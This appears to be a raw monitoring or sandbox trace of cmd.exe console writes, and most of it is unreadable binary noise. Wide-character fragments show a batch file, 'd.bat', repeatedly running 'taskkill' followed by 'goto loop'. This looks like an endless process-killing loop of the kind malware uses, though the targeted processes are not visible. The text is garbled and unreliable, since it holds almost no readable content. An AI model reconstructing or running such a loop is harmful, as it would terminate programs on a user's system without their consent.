Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......Qk..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....]k..............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......ck......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......ik..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........l..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d........l.......................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........l...............................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........l............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........l..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l......l..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d........l......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........l..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......Qn..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......]n.......................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......cn...............................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......in............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......xn..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l......n..............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d........n......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........n..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........p..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d........p.......................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........p...............................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........p............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........p..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l......p..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d........p......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........p..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........r..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d........r.......................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........r...............................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........r............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........r..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l......r..............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d........r......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........r..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......$u..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......0u.......................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......6u...............................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......<u............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......Ku..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....Wu..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......]u......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......cu..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........w..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d........w.......................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........w...............................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........x............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........x..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l..... x..............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......&x......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......,x..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........y..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d........y.......................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........y...............................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........y............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........y..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l......y..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d........z......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........z..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......-{..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......9{.......................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......?{...............................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......E{............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......T{..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....`{..............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......f{......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......l{..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........|..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d........|.......................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........|...............................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........|............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........|..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l......|..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d........|......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........|..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......R~..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......^~.......................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......d~...............................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......j~............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......y~..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l......~..............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d........~......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........~..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......-...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....9...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......?.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......E...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......D...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......P........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......V................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......\.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......k...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....w...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......}.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......C...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......O........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......U................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......[.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......j...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....v...............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......|.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......r...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......~........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......Q...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......]........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......c................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......i.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......x...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......j...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......v........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......|................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......#.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......)...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......$.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......3...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....?...............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......E.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......K...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......!................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......'.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......6...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....B...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......H.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......N...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......1...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......=........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......C................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......I.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......X...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....d...............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......j.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......p...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......'...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......3........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......9................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......?.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......N...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....Z...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......`.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......f...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......j...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......v........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......|................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d....... ...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......5...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......A........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......G................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......M.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......\...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....h...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......n.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......t...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......@...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......L........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......R................................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......X.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......g...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....s...............................<..J.....bNw..\u`.............................nw
